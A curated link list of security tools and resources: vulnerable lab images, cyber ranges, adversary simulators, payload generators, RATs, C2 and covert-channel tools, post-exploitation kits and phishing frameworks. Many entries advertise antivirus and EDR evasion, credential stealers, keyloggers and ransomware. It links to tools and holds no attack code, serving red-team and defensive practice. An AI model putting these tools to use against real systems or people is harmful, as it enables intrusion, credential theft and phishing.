Nimo-Awesome_repo

Table of Contents

Useful Docker Images Misc Docker Misc Useful Stuff Threat Hunting & Simulation

• Adversary/Threat Simulation
• Cyber Ranges / Labs Payloads / RATS Stealthy Communication / Covert Channel Post Exploitation Social Engineering AIO Tools / Frameworks Hunting Guides / Forensics / MISC Blue Teams - Honeypots / IDS / Traps/ CTR Web Security XSS Resources Cloud Security Office365 / AAD Security Online Tools API Stuff Password Lists Stress Test / Web Traffic Simulation / Test Automation

Usefull Docker Images

Vulnerable Apps`
• https://github.com/citizen-stig/dockermutillidae
• https://hub.docker.com/r/opendns/security-ninjas/
• https://github.com/remotephone/dvwa-lamp
• https://hub.docker.com/r/ismisepaul/securityshepherd/
• https://hub.docker.com/r/danmx/docker-owasp-webgoat/
• https://github.com/bkimminich/juice-shop
• https://github.com/payatu/Tiredful-API
• jackhammer - One Security vulnerability assessment/management tool: https://github.com/olacabs/jackhammer/blob/master/docker-build.sh
• owtf - Offensive Web Testing Framework: https://github.com/owtf/owtf/tree/develop/docker
• docker-blackeye - container for running the phishing attack using Blackeye: https://github.com/vishnudxb/docker-blackeye
• h8mail - Powerful and user-friendly password finder: https://github.com/khast3x/h8mail/blob/master/Dockerfile
• Instatbox - a project that spins up temporary Linux systems with instant webshell access from any browser: https://github.com/instantbox/instantbox/blob/master/Dockerfile
• envizon - state of the art network visualization and vulnerability reporting tool: https://github.com/evait-security/envizon/tree/master/docker



Misc Docker

• https://hub.docker.com/r/blacktop/cuckoo/ https://github.com/blacktop/docker-cuckoo
• Script to check docker security(CIS) - https://hub.docker.com/r/diogomonica/docker-bench-security/
• clair - static analysis of vulnerabilities in application containers: https://github.com/coreos/clair
• WebMap - A Web Dashbord for Nmap XML Report: https://github.com/Rev3rseSecurity/WebMap/tree/v2.1/master/docker
• anchore - centralized service for inspection, analysis and certification of container images: https://github.com/anchore/anchore-engine
• https://hub.docker.com/r/ahannigan/docker-arachni/
• https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
• Portainer - Docker manager - http://portainer.io/install.html
• Connect to local host with persistance : docker run -d -p 9000:9000 -v /var/run/docker.sock:/var/run/docker.sock -v /path/on/host/data:/data portainer/portainer
• Kali linux base + web tools installation: https://hub.docker.com/r/kalilinux/kali-linux-docker/
  • apt-get -y install kali-linux-web && apt-get purge
• Malware sample downloader - https://hub.docker.com/r/remnux/maltrieve/
• Awesome docker repo: https://github.com/veggiemonk/awesome-docker
• OWASP Security Knowledge Framework: https://github.com/blabla1337/skf-flask
  
• Haskell Dockerfile Linter - A smarter Dockerfile linter that helps you build best practice Docker images: https://github.com/hadolint/hadolint
docker run -ti -p 127.0.0.1:443:5443 blabla1337/skf-flask
• OWASP security Shepard: https://hub.docker.com/r/ismisepaul/securityshepherd/
  docker run -i -p 80:80 -p 443:443 -t ismisepaul/securityshepherd /bin/bash /usr/bin/mysqld_safe & service tomcat7 start
  If you don't have authbind installed and configured on your host machine e.g. on Ubuntu you'll need to do the following:
  sudo apt-get install authbind
  touch /etc/authbind/byport/80
  touch /etc/authbind/byport/443
  chmod 550 /etc/authbind/byport/80
  chmod 550 /etc/authbind/byport/443
  chown tomcat7 /etc/authbind/byport/80
  chown tomcat7 /etc/authbind/byport/443

Whaler - reverse engineer a Docker Image into the Dockerfile: https://github.com/P3GLEG/Whaler

ntopng - https://github.com/lucaderi/ntopng-docker

goca - a FOCA fork written in Go: https://github.com/gocaio/goca

Mondoo - docker image scanner: https://github.com/mondoolabs/mondoo

Misc Usefull Stuff

• Bypass application whitelisting: http://www.blackhillsinfosec.com/?p=5633
• Malcious outlook rules: https://silentbreaksecurity.com/malicious-outlook-rules/
• Great cheatsheets https://highon.coffee/blog/cheat-sheet/
• Headless Browseres https://github.com/dhamaniasad/HeadlessBrowsers
• Linode Linux useful IP commands: https://www.linode.com/docs/networking/linux-static-ip-configuration
• netdata - system for distributed real-time performance and health monitoring: https://github.com/firehol/netdata
• yamot - Yet Another Monitoring Tool: https://github.com/knrdl/yamot
• NSIS (Nullsoft Scriptable Install System) is a professional open source system to create Windows installers: https://sourceforge.net/projects/nsis/
• awesome-pentest: https://github.com/enaqx/awesome-pentest

Threat Hunting && Simulation

Cyber Ranges / Labs

• Kubernetes Local Security Testing Lab - There's a number of playbooks which will bring up cluster's with a specific mis-configuration that can be exploited: https://github.com/raesene/kube_security_lab
• simulator - a distributed systems and infrastructure simulator for attacking and debugging Kubernetes: simulator creates a Kubernetes cluster for you in your AWS account; runs scenarios which misconfigure it and/or leave it vulnerable to compromise and trains you in mitigating against these vulnerabilities: https://github.com/kubernetes-simulator/simulator
• Splunk attack range: https://github.com/splunk/attack_range
• Red-Baron - a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient, disposable, secure and agile infrastructure for Red Teams: https://github.com/Coalfire-Research/Red-Baron
• HazProne - a Cloud Pentesting Framework that emulates close to Real-World Scenarios by deploying Vulnerable-By-Demand aws resources enabling you to pentest Vulnerabilities within, and hence, gain a better understanding of what could go wrong and why. The framework helps gain practical, AWS Penetration testing knowledge/skills: https://github.com/stafordtituss/HazProne
• CI/CDon't - This project will deploy intentionally vulnerable software/infrastructure to your AWS account: https://hackingthe.cloud/aws/capture_the_flag/cicdont/
• Datadog Security Labs Research - this repository aims at providing proof of concept exploits and technical demos to help the community respond to threats: https://github.com/DataDog/security-labs-pocs
• GitGoat - enables DevOps and Engineering teams to test security products intending to integrate with GitHub. GitGoat is a learning and training project that demonstrates common configuration errors that can potentially allow adversaries to introduce code to production: https://github.com/arnica-ext/GitGoat
• cloudgoat - is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool: https://github.com/RhinoSecurityLabs/cloudgoat
• CyberRange - this project provides a bootstrap framework for a complete offensive, defensive, reverse engineering, & security intelligence tooling in a private research lab using the AWS Cloud: https://github.com/secdevops-cuse/CyberRange
• AWSGoat - A Damn Vulnerable AWS Infrastructure. AWSGoat is a vulnerable by design infrastructure on AWS featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfiguration: https://github.com/ine-labs/AWSGoat
• AzureGoat - a vulnerable by design infrastructure on Azure featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfiguration: https://github.com/ine-labs/AzureGoat
• GCPGoat - A Damn Vulnerable GCP Infrastructure: https://github.com/ine-labs/GCPGoat
• Supply Chain Goat - provides a training ground to practice implementing countermeasures specific to the software supply chain: https://github.com/step-security/supply-chain-goat
• oidc-ssrf - evil OIDC server: the OpenID Configuration URL returns a 307 to cause SSRF: https://github.com/doyensec/oidc-ssrf
• PurpleCloud - Pentest Cyber Range for a small Active Directory Domain. Automated templates for building your own Pentest/Red Team/Cyber Range in the Azure cloud: https://github.com/iknowjason/PurpleCloud
• BadBlood - fills a Microsoft Active Directory Domain with a structure and thousands of objects: https://github.com/davidprowe/BadBlood
• Detection Lab - this lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations: https://github.com/clong/DetectionLab
• vulnerable-AD - create a vulnerable active directory that's allowing you to test most of active directory attacks in local lab: https://github.com/WazeHell/vulnerable-AD
• ADLab - a tool created in PowerShell to quickly setup an Active directory lab for testing purposes. This tool can help setup a Domain controller and Workstation in a lab environment quickly and effectively: https://browninfosecguy.com/Active-Directory-Lab-Setup-Tool | https://github.com/browninfosecguy/ADLab
• Azure purple team lab by BLackHills InfoSec: https://www.blackhillsinfosec.com/how-to-applied-purple-teaming-lab-build-on-azure-with-terraform/ | https://github.com/DefensiveOrigins/APT-Lab-Terraform
• Redcloud - a powerful and user-friendly toolbox for deploying a fully featured Red Team Infrastructure using Docker: https://github.com/khast3x/Redcloud
• BlueCloud - Cyber Range deployment of HELK and Velociraptor! Automated terraform deployment of one system running HELK + Velociraptor server with one registered Windows endpoint in Azure or AWS: https://github.com/iknowjason/BlueCloud
• Damn Vulnerable Functions as a Service: https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
• kali-purple - the ultimate SOC in a box: https://gitlab.com/kalilinux/documentation/kali-purple
• AHHHZURE - n automated vulnerable Azure deployment script designed for offensive security practitioners and enthusiasts to brush up their cloud sec skills: https://github.com/gladstomych/AHHHZURE
• Damn Vulnerable Restaurant API Game - An intentionally vulnerable API service designed for learning and training purposes dedicated to developers, ethical hackers and security engineers: https://github.com/theowni/Damn-Vulnerable-Restaurant-API-Game
• messypoutine - a GitHub organization demonstrating ⚠️ purposely vulnerable build pipelines: https://github.com/messypoutine/
• DVAPI - DVAPI Damn Vulnerable API: https://github.com/payatu/DVAPI

Adversary/Threat Simulation

• Uber metta: https://github.com/uber-common/metta
• SANS HELK Part 1: https://isc.sans.edu/forums/diary/Threat+Hunting+Adversary+Emulation+The+HELK+vs+APTSimulator+Part+1/23525/
• SANS HELK Part 2: https://isc.sans.edu/forums/diary/Threat+Hunting+Adversary+Emulation+The+HELK+vs+APTSimulator+Part+2/23529/
• CALDERA: https://github.com/mitre/caldera
• Infection Monkey: https://github.com/guardicore/monkey || https://www.guardicore.com/infectionmonkey/
• APTSimulator: https://github.com/NextronSystems/APTSimulator
• atomic-red-team: https://github.com/redcanaryco/atomic-red-team
• Red Team Automation(RTA): https://github.com/endgameinc/RTA
• Network Flight Simulator: https://github.com/alphasoc/flightsim
• Redhunt - Virtual Machine for Adversary Emulation and Threat Hunting: https://github.com/redhuntlabs/RedHunt-OS
• Blue Team Training Kit: https://www.bt3.no/
• UBoat - POC HTTP Botnet designed to replicate a full weaponised commercial botnet: https://github.com/Souhardya/UBoat
• Chain Reactor - is an open source framework for composing executables that can simulate adversary behaviors and techniques on Linux endpoints: https://github.com/redcanaryco/chain-reactor
• Redcloud - a powerful and user-friendly toolbox for deploying a fully featured Red Team Infrastructure using Docker.https://github.com/khast3x/Redcloud
• Red Teaming/Adversary Simulation Toolkit - a collection of open source and commercial tools that aid in red team operationshttps://github.com/infosecn1nja/Red-Teaming-Toolkit
• racketeer - Ransomware emulation toolkit: https://github.com/dsnezhkov/racketeer
• PurpleSharp - adversary simulation tool written in C# that executes adversary techniques within Windows Active Directory environments. The resulting telemetry can be leveraged to measure and improve the efficacy of a detection engineering program. PurpleSharp leverages the MITRE ATT&CK Framework and executes different techniques across the attack life cycle: execution, persistence, privilege escalation, credential access, lateral movement, etc. It currently supports 47 unique ATT&CK techniques: https://github.com/mvelazc0/PurpleSharp
• pingcastle - a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework: https://github.com/vletoux/pingcastle
• Some red team automation (RTA) python scripts that run on Windows, Mac OS, and *nix. RTA scripts emulate known attacker behaviors and are an easy way too verify that your rules are active and working as expected - https://github.com/elastic/detection-rules/tree/3e511965b49eae69d103b9210765bceee9cb6396/rta
• Teqnix - Penetration Testing Platform. Along with all the cool automation features, some of the benefits of TEQNIX is having access to a set of tools that do not require the user to install or to maintain them. Furthermore, the library of tools is an asset to your testing methodologies ready to be launched.https://teqnix.io/
• ATTPwn - a computer security tool designed to emulate adversaries. The tool aims to bring emulation of a real threat into closer contact with implementations based on the techniques and tactics from the MITRE ATT&CK framework: https://github.com/ElevenPaths/ATTPwn

Payloads / RATS

• The Axer - Automatic msfvenom payload generator: https://github.com/ceh-tn/The-Axer
• pwnJS - JS payloads: https://github.com/theori-io/pwnjs
• SpookFlare: https://github.com/hlldz/SpookFlare
• Sharpshooter - payload creation framework for the retrieval and execution of arbitrary CSharp source code: https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/ || https://github.com/mdsecactivebreach/SharpShooter
• CACTUSTORCH - A JavaScript and VBScript shellcode launcher: https://github.com/mdsecactivebreach/CACTUSTORCH
• DotNetToJScript - A tool to generate a JScript which bootstraps an arbitrary .NET Assembly and class: https://github.com/tyranid/DotNetToJScript
• Fancy Bear - flatl1ne repo: https://github.com/FlatL1neAPT
• ShellPop - generate easy and sofisticated reverse or bind shell commands: https://github.com/0x00-0x00/ShellPop
• Vayne-Rat - C# RAT: https://github.com/TheM4hd1/Vayne-RaT
• avet - AntiVirus Evasion Tool: https://github.com/govolution/avet
• ph0neutria - malware zoo builder that sources samples straight from the wild: https://github.com/phage-nz/ph0neutria
• GreatSCT - tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions: https://github.com/GreatSCT/GreatSCT
• ASWCrypter - An Bash&Python Script For Generating Payloads that Bypasses Antivirus: https://github.com/AbedAlqaderSwedan1/ASWCrypter
• WePWNise - generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software: https://github.com/mwrlabs/wePWNise
• BYOB - is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets: https://github.com/malwaredllc/byob
• Androspy - Backdoor Crypter & Creator with Automatic IP Poisener: https://github.com/TunisianEagles/Androspy
• Phantom-Evasion - an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads): https://github.com/oddcod3/Phantom-Evasion
• Kage - designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads: https://github.com/WayzDev/Kage
• pypykatz_server - This is the server part of a server-agent model credential acquiring tool(mimikatz) based on pypykatz: https://github.com/skelsec/pypykatz_server
• macro pack - a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format: https://github.com/sevagas/macro_pack
• Evil Clippy - a cross-platform assistant for creating malicious MS Office documents: https://github.com/outflanknl/EvilClippy
• pixload - Set of tools for creating/injecting payload into images: https://github.com/chinarulezzz/pixload
• Pown.js - is a security testing and exploitation toolkit built on top of Node.js and NPM. Unlike traditional security tools like Metasploits, Pown.js considers frameworks to be an anti-pattern: https://github.com/pownjs/pown/blob/master/README.md
• nodeCrypto - is a linux Ransomware written in NodeJs that encrypt predefined files: https://github.com/atmoner/nodeCrypto
• MalwareBazaar - is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers: https://bazaar.abuse.ch/
• RapidPayload - Metasploit Payload Generator: https://github.com/AngelSecurityTeam/RapidPayload
• SGN - a polymorphic binary encoder for offensive security purposes such as generating statically undetecable binary payloads: https://github.com/EgeBalci/sgn/blob/master/README.md
• Arbitrium-RAT - a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding: https://github.com/BenChaliah/Arbitrium-RAT
• ScareCrow - a payload creation framework for generating loaders for the use of side loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls): https://github.com/optiv/ScareCrow
• SharpEDRChecker - catches hidden EDRs as well via its metadata checks, more info in a blog post coming soon: https://github.com/PwnDexter/SharpEDRChecker
• ratel - penetration test tool that allows you to take control of a windows machine: https://github.com/FrenchCisco/RATel
• OffensivePipeline - allows to download, compile (without Visual Studio) and obfuscate C# tools for Red Team exercises: https://github.com/Aetsu/OffensivePipeline
• Limelighter - a tool which creates a spoof code signing certificates and sign binaries and DLL files to help evade EDR products and avoid MSS and sock scruitneyhttps://github.com/Tylous/Limelighter
• Chimera - a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions: https://github.com/tokyoneon/Chimera
• Dent - A framework generates code to exploit vulnerabilties in Microsoft Defender Advanced Threat Protection's Attack Surface Reduction (ASR) rules to execute shellcode without being detected or prevented: https://github.com/optiv/Dent
• onelinepy - Python Obfuscator for FUD Python Code: https://github.com/spicesouls/onelinepy
• MeterPwrShell - automated Tool That Generate A Powershell Oneliner That Can Create Meterpreter Shell On Metasploit,Bypass AMSI,Bypass Firewall,Bypass UAC,And Bypass Windows Defender: https://github.com/GetRektBoy724/MeterPwrShell
• SigFlip - tool for patching authenticode signed PE files (exe, dll, sys ..etc) in a way that doesn't affect or break the existing authenticode signature, in other words you can change PE file checksum/hash by embedding data (i.e shellcode) without breaking the file signature, integrity checks or PE file functionality: https://github.com/med0x2e/SigFlip
• go-shellcode - a repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques: https://github.com/Ne0nd0g/go-shellcode

Stealthy Communication / Covert Channel

• PowerDNS: https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/ || https://github.com/mdsecactivebreach/PowerDNS
• Demiguise - generate .html files that contain an encrypted HTA: file:https://github.com/nccgroup/demiguise
• EmbedInHTML - Embed and hide any file in HTML: https://github.com/Arno0x/EmbedInHTML
• DNSCAT2: https://github.com/iagox86/dnscat2
• DNS-Shell - an interactive Shell over DNS channel: https://github.com/sensepost/DNS-Shell
• Sensepost Data exfiltration Toolkit(DET): https://github.com/sensepost/DET
• Pyexfil: https://github.com/ytisf/PyExfil
• DoxuCannon: https://github.com/audibleblink/doxycannon
• Grok-backdoor: https://github.com/deepzec/Grok-backdoor
• foxtrot C2 - C&C to deliver content and shuttle command execution instructions: https://github.com/dsnezhkov/foxtrot
• Invisi-Shell - bypasses all of Powershell security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .Net assemblies: https://github.com/OmerYa/Invisi-Shell
• SILENTTRINITY: https://github.com/byt3bl33d3r/SILENTTRINITY
• PowerHub - A web application to transfer PowerShell modules, executables, snippets and files while bypassing AV and application whitelisting: https://github.com/AdrianVollmer/PowerHub
• FruityC2 - post-exploitation framework based on the deployment of agents on compromised machines: https://github.com/xtr4nge/FruityC2
• hershell - Simple TCP reverse shell written in Go: https://github.com/lesnuages/hershell
• Reverse Shell Cheat Sheet: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
• Silver - a general purpose cross-platform implant framework that supports C2 over Mutual-TLS, HTTP(S), and DNS: https://github.com/BishopFox/sliver/blob/master/README.md
• Slackor - A Golang implant that uses Slack as a command and control channel: https://github.com/Coalfire-Research/Slackor
• FudgeC2 - a campaign orientated Powershell C2 framework built on Python3/Flask - Designed for team collaboration, client interaction, campaign timelining, and usage visibility: https://github.com/Ziconius/FudgeC2
• HRShell - an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities: https://github.com/chrispetrou/HRShell
• DNS-Shell - is an interactive Shell over DNS channel: https://github.com/sensepost/DNS-Shell
• ninja - C2 server created by Purple Team to do stealthy computer and Active directoty enumeration without being detected by SIEM and AVs: https://github.com/ahmedkhlief/Ninja
• faction framework - a C2 framework for security professionals, providing an easy way to extend and interact with agents. It focuses on providing an easy, stable, and approachable platform for C2 communications through well documented REST and Socket.IO APIs: https://www.factionc2.com/
• chisel - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH: https://github.com/jpillora/chisel
• Udp2raw-tunnel - A Tunnel which turns UDP Traffic into Encrypted FakeTCP/UDP/ICMP Traffic by using Raw Socket, helps you Bypass UDP FireWalls(or Unstable UDP Environment): https://github.com/wangyu-/udp2raw-tunnel
• mubeng - an incredibly fast proxy checker & IP rotator with ease: https://github.com/kitabisa/mubeng
• Interactsh - an Open-Source Solution for Out of band Data Extraction, A tool designed to detect bugs that cause external interactions, For example - Blind SQLi, Blind CMDi, SSRF, etc: https://github.com/projectdiscovery/interactsh
• reverse-ssh - a statically-linked ssh server with a reverse connection feature for simple yet powerful remote accesshttps://github.com/Fahrj/reverse-ssh
• ligolo-ng - a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection without the need of SOCKS: https://github.com/tnpitsecurity/ligolo-ng
• Azure Outlook C2 - Azure Outlook Command & Control that uses Microsoft Graph API for C2 communications & data exfiltration: https://github.com/boku7/azureOutlookC2
• interactsh - Open-Source Solution for Out of band Data Extraction, A tool designed to detect bugs that cause external interactions, For example - Blind SQLi, Blind CMDi, SSRF, etc: https://github.com/projectdiscovery/interactsh
• rconn - a multiplatform program for creating reverse connections. It lets you consume services that are behind NAT and/or firewall without adding firewall rules or port-forwarding: https://github.com/jafarlihi/rconn
• GoSH - Golang reverse/bind shell generator. This tool generates a Go binary that launches a shell of the desired type on the targeted host: https://github.com/redcode-labs/GoSH
• tornado - anonymously reverse shell over onion network using hidden services without portfortwarding: https://github.com/samet-g/tornado
• bore - a modern, simple TCP tunnel in Rust that exposes local ports to a remote server, bypassing standard NAT connection firewalls: https://github.com/ekzhang/bore
• Outline - lets anyone create, run, and share access to their own VPN. Outline is designed to be resistant to blocking.: https://getoutline.org/
• RedGuard - provide a better C2 channel hiding solution for the red team, that provides the flow control for the C2 channel, blocks the "malicious" analysis traffic, and better completes the entire attack task: https://github.com/wikiZ/RedGuard
• RedWarden - was created to solve the problem of IR/AV/EDRs/Sandboxes evasion on the C2 redirector layer. It's intended to supersede classical Apache2 + mod_rewrite setups used for that purpose: https://github.com/mgeeky/RedWarden
• RedditC2 - Abusing Reddit API to host the C2 traffic: https://github.com/kleiton0x00/RedditC2

Post Exploitation

• PowerLurk - PowerShell toolset for building malicious WMI Event Subsriptions: https://github.com/Sw4mpf0x/PowerLurk
• Merlin - cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang: https://github.com/Ne0nd0g/merlin
• phpsploit - a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server: https://github.com/nil0x42/phpsploit
• PE-Linux - Linux Privilege Escalation Tool: https://github.com/WazeHell/PE-Linux
• bad-Pdf - reate malicious PDF to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines: https://github.com/deepzec/Bad-Pdf
• novahot - webshell framework for penetration testers: https://github.com/chrisallenlane/novahot
• Windows-Exploit-Suggester - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target: https://github.com/GDSSecurity/Windows-Exploit-Suggester
• LOLBAS - Living Off The Land Binaries And Scripts - https://github.com/LOLBAS-Project/LOLBAS | https://lolbas-project.github.io/#
• Koadic - COM Command & Control, is a Windows post-exploitation rootkit.Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript): https://github.com/zerosum0x0/koadic
• 0xsp-Mongoose - Linux Privilege Escalation intelligent Enumeration Toolkit: https://github.com/lawrenceamer/0xsp-Mongoose
• wmigen - generate Batch, C, C++, C#, Delphi, F#, Java, JScript, KiXtart, Lua, Object Pascal, (Open) Object Rexx, Perl, PHP, PowerShell, Python, Ruby, Tcl, VB .NET or VBScript code for menu selected WMI queries: https://www.robvanderwoude.com/wmigen.php
• CryptonDie - a ransomware developed for study purposes: https://github.com/zer0dx/cryptondie
• CQTools - This toolkit allows to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various keyloggers and leverage this information to deliver attacks: https://4f2bcn3u2m2u2z7ghc17a5jm-wpengine.netdna-ssl.com/wp-content/uploads/2019/03/cqtools-the-new-ultimate-hacking-toolkit-black-hat-asia-2019-2.7z | password: CQUREAcademy#123! | This whitepaper by Grzegorz Tworek describes CQtools usage": https://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Januszkiewicz-CQTools-New-Ultimate-Hacking-Toolkit-wp.pdf
• PEASS - Privilege Escalation Awesome Scripts SUITE: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
• Flux-Keylogger - javascript keylogger with web panel: https://github.com/LimerBoy/Flux-Keylogger
• Adamantium-Thief - Get chromium browsers: passwords, credit cards, history, cookies, bookmarks: https://github.com/LimerBoy/Adamantium-Thief
• chromepass - a python-based console application that generates a windows executable that Decrypt Chrome saved paswords, Send a file with the login/password combinations remotely: https://github.com/darkarp/chromepass/blob/master/README.md
• invoker - The goal is to use this tool when access to some Windows OS features through GUI is restricted: https://github.com/ivan-sincek/invoker
• Talon - a tool designed to perform automated password guessing attacks while remaining undetected. Great for user enumartion in domain environment(LDAP/Kerberos): https://github.com/optiv/talon | Great blog post regarding the attack: https://www.optiv.com/explore-optiv-insights/blog/digging-your-talons-new-take-password-guessing
• ADE - ActiveDirectoryEnum: https://github.com/CasperGN/ActiveDirectoryEnumeration
• PYTMIPE - PYthon library for Token Manipulation and Impersonation for Privilege Escalation: https://github.com/quentinhardy/pytmipe
• Invoke-PSImage - Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute: https://github.com/peewpw/Invoke-PSImage
• wynis - Just a powershell scripts for auditing security with CIS BEST Practices Windows 10 and Window Server 2016: https://github.com/Sneakysecdoggo/Wynis
• emp3r0r - linux post-exploitation framework written in go: https://github.com/jm33-m0/emp3r0r
• Vulmap - online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes: https://github.com/vulmon/Vulmap
• traitor - automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy: https://github.com/liamg/traitor
• pwncat - a post-exploitation platform for Linux targets. It started out as a wrapper around basic bind and reverse shells and has grown from there. It streamlines common red team operations while staging code from your attacker machine, not the target: https://github.com/calebstewart/pwncat
• reverse-shell-generator - Hosted Reverse Shell generator with a ton of functionality: https://github.com/0dayCTF/reverse-shell-generator
• Go-RouterSocks - this tool will expose one socks port and route the traffic through the configured path: https://github.com/nodauf/Go-RouterSocks
• GodSpeed - a robust and intuitive manager for reverse shells: https://github.com/redcode-labs/GodSpeed
• SharpHound - C# Rewrite of the BloodHound Ingestor: https://github.com/BloodHoundAD/SharpHound3
• Max Bloodhound - Maximizing BloodHound with a simple suite of tools: https://github.com/knavesec/Max
• SNOWCRASH - polyglot payload generator. Creates a script that can be launched on both Linux and Windows machines: https://github.com/redcode-labs/SNOWCRASH
• PoisonApple - command-line tool to perform various persistence mechanism techniques on macOS: https://github.com/CyborgSecurity/PoisonApple
• DripLoader - Evasive shellcode loader for bypassing event-based injection detection, without necessarily suppressing event collection: https://github.com/xinbailu/DripLoader
• r77 Rootkit - a ring 3 Rootkit that hides entities from all processes: https://github.com/bytecode77/r77-rootkit
• SharpHook - inspired by the SharpRDPThief project, It uses various API hooks in order to give us the desired credentials.: https://github.com/IlanKalendarov/SharpHook
• PowerShdll - Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe and regsvr32.exe: https://github.com/p3nt4/PowerShdll/tree/master/dll
• PSAmsi - a tool for auditing and defeating AMSI signatures: https://github.com/cobbr/PSAmsi
• OffensivePipeline - allows to download, compile (without Visual Studio) and obfuscate C# tools for Red Team exercises: https://github.com/Aetsu/OffensivePipeline
• MrKaplan - a tool aimed to help red teamers to stay hidden by clearing evidence of execution. It works by saving information such as the time it ran, snapshot of files and associate each evidence to the related user: https://github.com/Idov31/MrKaplan
• Freeze - a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls: https://github.com/optiv/Freeze
• garble - produce a binary that works as well as a regular build, but that has as little information about the original source code as possible: https://github.com/burrowers/garble
• shennina - an automated host exploitation framework. The mission of the project is to fully automate the scanning, vulnerability scanning/analysis, and exploitation using Artificial Intelligence: https://github.com/mazen160/shennina

Social Engineering

• blackeye - Phishing Tool, with 32 templates: https://github.com/thelinuxchoice/blackeye
• Phishing-API: https://github.com/curtbraz/Phishing-API
• Social Phish - https://github.com/UndeadSec/SocialFish
• Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level: https://github.com/drk1wi/Modlishka
• The Social-Engineer Toolkit: https://github.com/trustedsec/social-engineer-toolkit
• HiddenEye - Modern Phishing Tool With Advanced Functionality: https://github.com/DarkSecDevelopers/HiddenEye
• o365-attack-toolkit - allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information: https://github.com/mdsecactivebreach/o365-attack-toolkit
• Phishing Simulation - mainly aims to increase phishing awareness by providing an intuitive tutorial and customized assessment: https://github.com/jenyraval/Phishing-Simulation
• ShellPhish - Phishing Tool for Instagram, Facebook, Twitter, Snapchat, Github, Yahoo and more: https://github.com/thelinuxchoice/shellphish
• zphisher - upgrdaed version(fork) of Shellphish: https://github.com/htr-tech/zphisher
• nexphisher - Advanced phishing tool: https://github.com/htr-tech/nexphisher
• maskphish - a simple script to hide phishing URL under a normal looking URL(google.com or facebook.com): https://github.com/jaykali/maskphish
• Gophish - phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training: https://github.com/gophish/gophish
  • How to set up gophish to evade security controls: https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls
  • The Ultimate Guide to Phishing - Learn how to Phish using EvilGinx2 and GoPhish: https://sidb.in/2021/08/03/Phishing-0-to-100.html
• SniperPhish - a phishing toolkit for pentester or security professionals to enhance user awareness by simulating real-world phishing attacks. SniperPhish helps to combine both phishing emails and phishing websites you created to centrally track user actions: https://github.com/GemGeorge/SniperPhish
• phishmonger - Phishing platform designed for pentesters. This tool allows us to craft phishing emails in Outlook, clone them quickly, automatically template them for mass distribution, test email templates, schedule phishing campaigns, and track phishing results. Phishmonger is not just GoPhish in Node! You do not have to set up a separate mail server. Phishmonger itself is a mail server: https://github.com/fkasler/phishmonger
• awsssome_phish - phish aws sso code with dynamic url creation with lambda function: https://github.com/sebastian-mora/awsssome_phish
• O365-Doppelganger - a quick handy script to harvest credentials of a user during Red Teams: https://github.com/paranoidninja/O365-Doppelganger
• BITB - Browser templates for Browser In The Browser (BITB) attack: https://github.com/mrd0x/BITB
• phishsticks - a phishing framework for OAuth 2.0 device code authentication grant flow: https://github.com/dunderhay/phishsticks

AIO Tools / Frameworks

• PowerSploit - A PowerShell Post-Exploitation Framework: https://github.com/PowerShellMafia/PowerSploit
• Empire: https://www.powershellempire.com/
• Empire GUI: https://github.com/EmpireProject/Empire-GUI
